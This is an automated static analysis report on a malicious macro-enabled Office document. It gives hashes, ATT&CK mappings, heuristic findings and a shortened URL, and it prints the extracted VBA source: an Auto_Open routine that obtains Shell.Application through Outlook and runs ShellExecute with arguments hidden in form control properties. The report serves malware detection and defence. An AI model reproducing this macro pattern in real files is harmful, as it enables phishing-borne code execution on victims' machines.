Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 41c4b2c621aa0d13…

MALICIOUS

Office (OOXML)

9.5 KB First seen: 2021-09-27
MD5: bee5a74b5ce0ce97276e846515139234 SHA-1: 683d67b560f2b8ac4d6186c07b51cf1e6e01fdc1 SHA-256: 41c4b2c621aa0d1377e4145d708686c3d9005cc0a7bacfbb515bf706896c66cb
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The OOXML document contains a VBA macro with an Auto_Open subroutine, which is automatically executed upon opening the document. The macro utilizes CreateObject to instantiate 'Shell.Application' and then calls 'ShellExecute' with parameters derived from 'gando.jackone.ControlTipText' and 'gando.jackone.Tag', indicating an attempt to execute arbitrary code. This behavior strongly suggests the document is a malicious macro-enabled file designed to download and execute a secondary payload.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitly.com/hdjksabndkjasd In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 940 bytes
SHA-256: cf5483cc28d918b418d373fe2e1e7b4ab927959a1bff14be4dcec21ec043501a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function microsoft()
Set Outlook = VBA.CreateObject("Outlook.Application")
Set microsoft = Outlook.CreateObject("Shell.Application")


End Function

Attribute VB_Name = "gando"
Attribute VB_Base = "0{77E3A9CB-D95A-424F-8AAF-C662DCADDDFE}{89DE108D-2C78-4BDF-A972-75F205C4754B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Module1"
Sub Auto_Open()
Sheet2.microsoft.ShellExecute gando.jackone.ControlTipText, gando.jackone.Tag
End _
Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 20480 bytes
SHA-256: 72e8a688d8dfe0e195e9d6b719e7d853d71cc984323a20ab7bcae103ce7b30fd

Open this report in the interactive analyzer, or submit your own file for analysis.